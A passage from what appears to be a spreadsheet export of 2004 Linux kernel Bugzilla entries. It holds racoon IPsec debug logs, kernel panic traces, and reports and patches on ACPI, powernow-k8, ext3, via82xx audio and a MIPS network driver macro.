0a0003f4 00000001 00000001 0200005c 01030402 c072ec18 03000028 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050001 00000028 02030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050002 02000034 02020401 c072ec18 00000028 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050002 02000030 02030401 7fc0da59 00000024 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 02000034 03020401 c072ec18 00000028 01020000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050001 02000030 03030401 7fc0da59 00000024 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 02000034 04020401 c072ec18 00000028 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050002 02000034 04030401 7fc0da59 00000028 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050002 02000034 05020401 c072ec18 00000028 01020000 80010001 00020 Aug 3 21:59:13 scooby racoon: DEBUG: hmac(hmac_sha1) Aug 3 21:59:13 scooby racoon: DEBUG: HASH computed: Aug 3 21:59:13 scooby racoon: DEBUG: 416fc129 f6e56e35 38696b7f 077c02b3 99fb3621 Aug 3 21:59:13 scooby racoon: DEBUG: anonymous sainfo selected. Aug 3 21:59:13 scooby racoon: DEBUG: get sa info: anonymous Aug 3 21:59:13 scooby racoon: DEBUG: get a src address from ID payload 192.168.0.100[1701] prefixlen=32 ul_proto=17 Aug 3 21:59:13 scooby racoon: DEBUG: get dst address from ID payload 192.168.0.2[0] prefixlen=32 ul_proto=17 Aug 3 21:59:13 scooby racoon: DEBUG: sub:0xbffff8e0: 192.168.0.100/32[1701] 192.168.0.2/32[0] proto=udp dir=in Aug 3 21:59:13 scooby racoon: DEBUG: db: 0x80aa020: 192.168.0.100/32[1701] 192.168.0.2/32[0] proto=udp dir=in Aug 3 21:59:13 scooby racoon: DEBUG: 0xbffff8e0 masked with /32: 192.168.0.100[1701] Aug 3 21:59:13 scooby racoon: DEBUG: 0x80aa020 masked with /32: 192.168.0.100[1701] Aug 3 21:59:13 scooby racoon: DEBUG: 0xbffff8e0 masked with /32: 192.168.0.2[0] Aug 3 21:59:13 scooby racoon: DEBUG: 0x80aa020 masked with /32: 192.168.0.2[0] Aug 3 21:59:13 scooby racoon: DEBUG: sub:0xbffff8e0: 192.168.0.2/32[0] 192.168.0.100/32[1701] proto=udp dir=out Aug 3 21:59:13 scooby racoon: DEBUG: db: 0x80aa020: 192.168.0.100/32[1701] 192.168.0.2/32[0] proto=udp dir=in Aug 3 21:59:13 scooby racoon: DEBUG: sub:0xbffff8e0: 192.168.0.2/32[0] 192.168.0.100/32[1701] proto=udp dir=out Aug 3 21:59:13 scooby racoon: DEBUG: db: 0x80aa258: 192.168.0.2/32[0] 192.168.0.100/32[1701] proto=udp dir=out Aug 3 21:59:13 scooby racoon: DEBUG: 0xbffff8e0 masked with /32: 192.168.0.2[0] Aug 3 21:59:13 scooby racoon: DEBUG: 0x80aa258 masked with /32: 192.168.0.2[0] Aug 3 21:59:13 scooby racoon: DEBUG: 0xbffff8e0 masked with /32: 192.168.0.100[1701] Aug 3 21:59:13 scooby racoon: DEBUG: 0x80aa258 masked with /32: 192.168.0.100[1701] Aug 3 21:59:13 scooby racoon: DEBUG: suitable SP found:192.168.0.2/32[0] 192.168.0.100/32[1701] proto=udp dir=out Aug 3 21:59:13 scooby racoon: DEBUG: (proto_id=ESP spisize=4 spi=00000000 spi_p=00000000 encmode=Transport reqid=0:0) Aug 3 21:59:13 scooby racoon: DEBUG: (trns_id=3DES encklen=0 authtype=hmac-md5) Aug 3 21:59:13 scooby racoon: DEBUG: total SA len=1008 Aug 3 21:59:13 scooby racoon: DEBUG: 00000001 00000001 0200005c 01030402 c072ec18 03000028 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050001 00000028 02030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050002 02000034 02020401 c072ec18 00000028 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050002 02000030 02030401 7fc0da59 00000024 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 02000034 03020401 c072ec18 00000028 01020000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050001 02000030 03030401 7fc0da59 00000024 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 02000034 04020401 c072ec18 00000028 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050002 02000034 04030401 7fc0da59 00000028 01030000 80010001 00020004 00000e10 80010002 00020004 0003d090 80040002 80050002 02000034 05020401 c072ec18 00000028 01020000 80010001 00020004 00000e10 80010 Aug 3 21:59:13 scooby racoon: DEBUG: begin. Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=2(prop) Aug 3 21:59:13 scooby last message repeated 17 times Aug 3 21:59:13 scooby racoon: DEBUG: succeed. Aug 3 21:59:13 scooby racoon: DEBUG: proposal #1 len=92 Aug 3 21:59:13 scooby racoon: DEBUG: begin. Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=3(trns) Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=3(trns) Aug 3 21:59:13 scooby racoon: DEBUG: succeed. Aug 3 21:59:13 scooby racoon: DEBUG: transform #1 len=40 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=seconds Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=kilobytes Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=Encryption Mode, flag=0x8000, lorv=Transport Aug 3 21:59:13 scooby racoon: DEBUG: type=Authentication Algorithm, flag=0x8000, lorv=hmac-md5 Aug 3 21:59:13 scooby racoon: DEBUG: transform #2 len=40 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=seconds Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=kilobytes Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=Encryption Mode, flag=0x8000, lorv=Transport Aug 3 21:59:13 scooby racoon: DEBUG: type=Authentication Algorithm, flag=0x8000, lorv=hmac-sha Aug 3 21:59:13 scooby racoon: DEBUG: proposal #2 len=52 Aug 3 21:59:13 scooby racoon: DEBUG: begin. Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=3(trns) Aug 3 21:59:13 scooby racoon: DEBUG: succeed. Aug 3 21:59:13 scooby racoon: DEBUG: transform #1 len=40 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=seconds Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=kilobytes Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=Encryption Mode, flag=0x8000, lorv=Transport Aug 3 21:59:13 scooby racoon: DEBUG: type=Authentication Algorithm, flag=0x8000, lorv=hmac-sha Aug 3 21:59:13 scooby racoon: DEBUG: proposal #2 len=48 Aug 3 21:59:13 scooby racoon: DEBUG: begin. Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=3(trns) Aug 3 21:59:13 scooby racoon: DEBUG: succeed. Aug 3 21:59:13 scooby racoon: DEBUG: transform #1 len=36 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=seconds Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=kilobytes Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=Encryption Mode, flag=0x8000, lorv=Transport Aug 3 21:59:13 scooby racoon: DEBUG: proposal #3 len=52 Aug 3 21:59:13 scooby racoon: DEBUG: begin. Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=3(trns) Aug 3 21:59:13 scooby racoon: DEBUG: succeed. Aug 3 21:59:13 scooby racoon: DEBUG: transform #1 len=40 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=seconds Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=kilobytes Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=Encryption Mode, flag=0x8000, lorv=Transport Aug 3 21:59:13 scooby racoon: DEBUG: type=Authentication Algorithm, flag=0x8000, lorv=hmac-md5 Aug 3 21:59:13 scooby racoon: DEBUG: proposal #3 len=48 Aug 3 21:59:13 scooby racoon: DEBUG: begin. Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=3(trns) Aug 3 21:59:13 scooby racoon: DEBUG: succeed. Aug 3 21:59:13 scooby racoon: DEBUG: transform #1 len=36 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=seconds Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=kilobytes Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=Encryption Mode, flag=0x8000, lorv=Transport Aug 3 21:59:13 scooby racoon: DEBUG: proposal #4 len=52 Aug 3 21:59:13 scooby racoon: DEBUG: begin. Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=3(trns) Aug 3 21:59:13 scooby racoon: DEBUG: succeed. Aug 3 21:59:13 scooby racoon: DEBUG: transform #1 len=40 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=seconds Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=kilobytes Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=Encryption Mode, flag=0x8000, lorv=Transport Aug 3 21:59:13 scooby racoon: DEBUG: type=Authentication Algorithm, flag=0x8000, lorv=hmac-sha Aug 3 21:59:13 scooby racoon: DEBUG: proposal #4 len=52 Aug 3 21:59:13 scooby racoon: DEBUG: begin. Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=3(trns) Aug 3 21:59:13 scooby racoon: DEBUG: succeed. Aug 3 21:59:13 scooby racoon: DEBUG: transform #1 len=40 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=seconds Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=kilobytes Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=Encryption Mode, flag=0x8000, lorv=Transport Aug 3 21:59:13 scooby racoon: DEBUG: type=Authentication Algorithm, flag=0x8000, lorv=hmac-sha Aug 3 21:59:13 scooby racoon: DEBUG: proposal #5 len=52 Aug 3 21:59:13 scooby racoon: DEBUG: begin. Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=3(trns) Aug 3 21:59:13 scooby racoon: DEBUG: succeed. Aug 3 21:59:13 scooby racoon: DEBUG: transform #1 len=40 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=seconds Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=kilobytes Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=Encryption Mode, flag=0x8000, lorv=Transport Aug 3 21:59:13 scooby racoon: DEBUG: type=Authentication Algorithm, flag=0x8000, lorv=hmac-md5 Aug 3 21:59:13 scooby racoon: DEBUG: proposal #5 len=52 Aug 3 21:59:13 scooby racoon: DEBUG: begin. Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=3(trns) Aug 3 21:59:13 scooby racoon: DEBUG: succeed. Aug 3 21:59:13 scooby racoon: DEBUG: transform #1 len=40 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=seconds Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=kilobytes Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=Encryption Mode, flag=0x8000, lorv=Transport Aug 3 21:59:13 scooby racoon: DEBUG: type=Authentication Algorithm, flag=0x8000, lorv=hmac-md5 Aug 3 21:59:13 scooby racoon: DEBUG: proposal #6 len=92 Aug 3 21:59:13 scooby racoon: DEBUG: begin. Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=3(trns) Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=3(trns) Aug 3 21:59:13 scooby racoon: DEBUG: succeed. Aug 3 21:59:13 scooby racoon: DEBUG: transform #1 len=40 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=seconds Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=kilobytes Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=Encryption Mode, flag=0x8000, lorv=Transport Aug 3 21:59:13 scooby racoon: DEBUG: type=Authentication Algorithm, flag=0x8000, lorv=hmac-md5 Aug 3 21:59:13 scooby racoon: DEBUG: transform #2 len=40 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=seconds Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=kilobytes Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=Encryption Mode, flag=0x8000, lorv=Transport Aug 3 21:59:13 scooby racoon: DEBUG: type=Authentication Algorithm, flag=0x8000, lorv=hmac-sha Aug 3 21:59:13 scooby racoon: DEBUG: proposal #7 len=52 Aug 3 21:59:13 scooby racoon: DEBUG: begin. Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=3(trns) Aug 3 21:59:13 scooby racoon: DEBUG: succeed. Aug 3 21:59:13 scooby racoon: DEBUG: transform #1 len=40 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=seconds Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=kilobytes Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=Encryption Mode, flag=0x8000, lorv=Transport Aug 3 21:59:13 scooby racoon: DEBUG: type=Authentication Algorithm, flag=0x8000, lorv=hmac-sha Aug 3 21:59:13 scooby racoon: DEBUG: proposal #7 len=48 Aug 3 21:59:13 scooby racoon: DEBUG: begin. Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=3(trns) Aug 3 21:59:13 scooby racoon: DEBUG: succeed. Aug 3 21:59:13 scooby racoon: DEBUG: transform #1 len=36 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=seconds Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=kilobytes Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=Encryption Mode, flag=0x8000, lorv=Transport Aug 3 21:59:13 scooby racoon: DEBUG: proposal #8 len=52 Aug 3 21:59:13 scooby racoon: DEBUG: begin. Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=3(trns) Aug 3 21:59:13 scooby racoon: DEBUG: succeed. Aug 3 21:59:13 scooby racoon: DEBUG: transform #1 len=40 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=seconds Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=kilobytes Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=Encryption Mode, flag=0x8000, lorv=Transport Aug 3 21:59:13 scooby racoon: DEBUG: type=Authentication Algorithm, flag=0x8000, lorv=hmac-md5 Aug 3 21:59:13 scooby racoon: DEBUG: proposal #8 len=48 Aug 3 21:59:13 scooby racoon: DEBUG: begin. Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=3(trns) Aug 3 21:59:13 scooby racoon: DEBUG: succeed. Aug 3 21:59:13 scooby racoon: DEBUG: transform #1 len=36 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=seconds Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=kilobytes Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=Encryption Mode, flag=0x8000, lorv=Transport Aug 3 21:59:13 scooby racoon: DEBUG: proposal #9 len=52 Aug 3 21:59:13 scooby racoon: DEBUG: begin. Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=3(trns) Aug 3 21:59:13 scooby racoon: DEBUG: succeed. Aug 3 21:59:13 scooby racoon: DEBUG: transform #1 len=40 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=seconds Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=kilobytes Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=Encryption Mode, flag=0x8000, lorv=Transport Aug 3 21:59:13 scooby racoon: DEBUG: type=Authentication Algorithm, flag=0x8000, lorv=hmac-sha Aug 3 21:59:13 scooby racoon: DEBUG: proposal #9 len=52 Aug 3 21:59:13 scooby racoon: DEBUG: begin. Aug 3 21:59:13 scooby racoon: DEBUG: seen nptype=3(trns) Aug 3 21:59:13 scooby racoon: DEBUG: succeed. Aug 3 21:59:13 scooby racoon: DEBUG: transform #1 len=40 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=seconds Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Duration, flag=0x0000, lorv=4 Aug 3 21:59:13 scooby racoon: DEBUG: type=SA Life Type, flag=0x8000, lorv=kilobytes Aug 3 21:59:13 scooby r</t>
  </si>
  <si>
    <t>2.6.7 stock kernel</t>
  </si>
  <si>
    <t>2004-08-04 12:44 UTC</t>
  </si>
  <si>
    <t>Spauldo da Hippie</t>
  </si>
  <si>
    <t>2008-09-24 07:18 UTC</t>
  </si>
  <si>
    <t>Grant Grundler</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: Pentium 75 Linksys LNE100TX 10/100 Network Adapter Zynx ZX312(?) 10Mbit Network Adapter Chip: Digital 21040-AA (other numbers: DC1012B, 21-40593-03) TP, BNC, AUI Connectors Circus Logic GD5426 Video Adapter Intel PCIset Chipset (hard to see in there) Intel PIIX IDE Controller (onboard) Software Environment: Debian Unstable (Late July) IPTables Modules (ipv4, ipv6) Hotplug subsystem Problem Description: On boot, with both network cards in, the system detects both network cards with hotplug. On debian, the network starts right after hotplug, and just a few seconds after the network is brought up, I either get a kernel panic with the de2104x.c (see below) or one involving the swapper (which I haven't got a copy of). With the zynx card removed, the system boots fine. Also, strangely enough (and agreeing with a similar report from the lkml), if the zynx card has a link (i.e. network cable plugged in and linking), it doesn't panic. My current setup doesn't really allow me to test if it actually works, however. I also can't test the AUI or BNC interfaces. Panic Info (copied by hand, some 0's might be 8's - the monitor was blurry): eth1: timeout expired stopping DMA -----------------[ cut here ]----------------- kernel BUG at drivers/net/tulip/de2104x.c:919! invalid operand: 0000 [#1] PREEMPT Modules linked in: ipv6 de2104x tulip CPU: 0 EIP 0060:[&lt;c4819ede&gt;] Not tainted EFLAGS: 00010206 (2.6.7) EIP is at de_set_media+0x1e/0x130 [de2104x] eax: fc200100 ebx: 00000292 ecx: c028c6b0 edx: c4811800 esi: c3f3a220 edi: 00000002 ebp: fffc0000 esp: c0314f8c ds: 007b es: 007b ss: 0068 Process net.agent (pid: 1016, threadinfo=c0314000 task=c3f6c5f0) Stack: 00000292 c0314000 c3f3a220 ffffffc6 c481a199 c3f3a220 c3f3a000 00000002 c3a22480 c3f3a220 c481a040 c0314000 c0314fcc c011918e c3f3a220 c0314fcc c0314fcc c0314fcc 00000000 00000011 c031d208 0000000a 00000000 c0115723 Call Trace: Stack pointer is garbage, not printing trace Code: 0f 0b 97 03 ac b6 81 c4 f6 86 a0 05 00 00 01 74 0a c7 42 58 &lt;0&gt;Kernel Panic: fatal exception in interrupt In interrupt handler - not syncing Steps to reproduce: Boot with a the card above or possibly one with the same chipset without plugging in the cable. Bring up the interface, wait a few seconds.</t>
  </si>
  <si>
    <t>acpi processor module needs to stay loaded for powernow-k8</t>
  </si>
  <si>
    <t>2.6.8rc3</t>
  </si>
  <si>
    <t>2004-08-05 05:07 UTC</t>
  </si>
  <si>
    <t>2005-07-27 17:20 UTC</t>
  </si>
  <si>
    <t>Patch has been in the suse kernel for some time, now submitted for inclusion. The powernow-k8 cpufreq module references symbols from the acpi processor driver. But it works even with acpi=off because it has a non ACPI fallback. When acpi processor is modular it won't load when acpi=off, which prevents powernow-k8 from loading. This patch just keeps the processor driver loaded even when the registration with ACPI fails.</t>
  </si>
  <si>
    <t>remove pae&amp;suspend warning</t>
  </si>
  <si>
    <t>2004-08-05 05:09 UTC</t>
  </si>
  <si>
    <t>2004-11-03 19:00 UTC</t>
  </si>
  <si>
    <t>Patch from the suse kernel. Remove an unnecessary warning message when suspend is enabled in a PAE kernel.</t>
  </si>
  <si>
    <t>remove dmi blacklists for HP machines</t>
  </si>
  <si>
    <t>2004-08-05 05:35 UTC</t>
  </si>
  <si>
    <t>2004-11-15 19:42 UTC</t>
  </si>
  <si>
    <t>acpi_config-tables</t>
  </si>
  <si>
    <t>from the sles9 kernel. These blacklists don't seem to be needed anymore and were removed.</t>
  </si>
  <si>
    <t>kernel BUG at fs/ext3/balloc.c:942!</t>
  </si>
  <si>
    <t>2.6.6-1.435-2.3</t>
  </si>
  <si>
    <t>2004-08-06 14:57 UTC</t>
  </si>
  <si>
    <t>2006-01-05 02:16 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 2 Hardware Environment: Dual P4 Xeon 2.4 Software Environment: ... Problem Description: This is a FC2 stock errata kernel 2.6.6-1.435.2.3, roughly equivalent to 2.6.7-rc2. This kernel does contain the bugfix in fs/ext3/file.c (http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=108395053322261&amp;w=2). This only occurs under heavy load, but I can't pinpoint where or how. It must be a race because we cannot reproduce the problem reliably. Steps to reproduce: Format filesystem and pound it with writing many variable sized files in a hashed 256 directory structure.</t>
  </si>
  <si>
    <t>irq 9: nobody cared! (audio related - via82xx)</t>
  </si>
  <si>
    <t>2.6.6+</t>
  </si>
  <si>
    <t>2004-08-07 17:44 UTC</t>
  </si>
  <si>
    <t>2004-12-15 00:06 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian (unstable) Hardware Environment: VIA Nehemiah CPU, via82xx audio (CL10000 mini-itx board) Problem Description: I am unable to play any audio since kernel version 2.6.6. Version 2.6.5 works fine and I have tested that 2.6.7 and 2.6.8-rc3-bk2 both do not work. When trying to play some audio, it sounds like there is about 0.5 seconds of audio played, which then loops for a few seconds, then the following message appears in dmesg: irq 9: nobody cared! [&lt;c010490e&gt;] dump_stack+0x1e/0x30 [&lt;c0105d3b&gt;] __report_bad_irq+0x2b/0x90 [&lt;c0105e26&gt;] note_interrupt+0x66/0xa0 [&lt;c01060d3&gt;] do_IRQ+0x133/0x150 [&lt;c01044d8&gt;] common_interrupt+0x18/0x20 [&lt;c011961b&gt;] do_softirq+0x2b/0x30 [&lt;c01060a8&gt;] do_IRQ+0x108/0x150 [&lt;c01044d8&gt;] common_interrupt+0x18/0x20 handlers: [&lt;c01da946&gt;] (acpi_irq+0x0/0x1a) Disabling IRQ #9 Steps to reproduce: "ogg123 somefile.ogg" or "mpg123 somefile.mp3", etc.</t>
  </si>
  <si>
    <t>2.4.27 boot message: \_SB_.PCI0._PRW Method execution failed</t>
  </si>
  <si>
    <t>2004-08-09 14:43 UTC</t>
  </si>
  <si>
    <t>step</t>
  </si>
  <si>
    <t>acpi_bios</t>
  </si>
  <si>
    <t>Distribution: Standard kernel 2.4.27 from kernel.org on Redhat 9 + Ximian Hardware Environment: AK75-EC (KT133) PCB B with ACPI option activated on bios. Last bios from the firm (DFI) : 03/28/2001 Bios Award ID : 6A6LMD4FC-00 Processor AMD ATHLON 1G Bios values concerning ACPI : ACPI function :Enabled ACPI Suspend type :S1(POS) PM control by apm :No Power management: user define. Software Environment: REdhat 9 + ximian. kernel 2.4.27 directly from kernel.org Problem Description: This error message was first seen while booting 2.4.23 and seems to be always here on the last release of the 2.4 kernel. I do not know what it means but there is no kernel crash at first sight. the ACPI activation listing seems to be shorter than on my other PC. Steps to reproduce: Easy : Each kernel boot. Following : my /var/log/message during the boot process. If any question about my report, I will try to help you. Aug 9 23:35:17 Mar-Sara syslogd 1.4.1: restart. ao</t>
  </si>
  <si>
    <t>powernowk8 compiles into kernel only if CONFIG_ACPI_PROCESSOR=y</t>
  </si>
  <si>
    <t>2.6.7 and 2.6.8-rc4</t>
  </si>
  <si>
    <t>2004-08-10 01:39 UTC</t>
  </si>
  <si>
    <t>Lars T</t>
  </si>
  <si>
    <t>2004-10-21 04:37 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE Linux 9.1 (x86-64) Hardware Environment: Tyan single Opteron 140 Software Environment: Problem Description: powernowk8 doesn't compile into kernel when CONFIG_ACPI_PROCESSOR=m or is not set it should depend on that in the menuconfig Steps to reproduce: mark powernowk8 as compiled into kernel and not acpi_processor or only as module Thanks for your great job any way Lars</t>
  </si>
  <si>
    <t>MIPS JAZZ jazzsonic.c bug</t>
  </si>
  <si>
    <t>2004-08-10 09:34 UTC</t>
  </si>
  <si>
    <t>Alec Voropay</t>
  </si>
  <si>
    <t>2004-08-19 23:48 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: MIPS JAZZ Software Environment: Problem Description: Can't compile "/drivers/net/jazzsonic.c" Steps to reproduce: It seems, this MIPS driver has a C _syntax_ bugs. This is a code from the "/drivers/net/jazzsonic.c:52" (vanilla Linux 2.4.26 kernel) Definition: ============================ #define SONIC_WRITE(reg,val) \ do { \ *((volatile unsigned int *)base_addr+reg) = val; \ } ============================ CPP expands it to the code like: ============================ do { *((volatile unsigned int *)base_addr+0x00) = 0x0080; }; ============================ GCC 2.9 can't compile this code because of "do" without "while" statement. It seem, it should be changed to the simply ============================ #define SONIC_WRITE(reg,val) { *((volatile unsigned int *)base_addr+reg) = val; } ============================</t>
  </si>
  <si>
    <t>Field unit is not handled correctly</t>
  </si>
  <si>
    <t>linux-2.6.8-rc4</t>
  </si>
  <si>
    <t>2004-08-10 17:47 UTC</t>
  </si>
  <si>
    <t>Kenji Kaneshige</t>
  </si>
  <si>
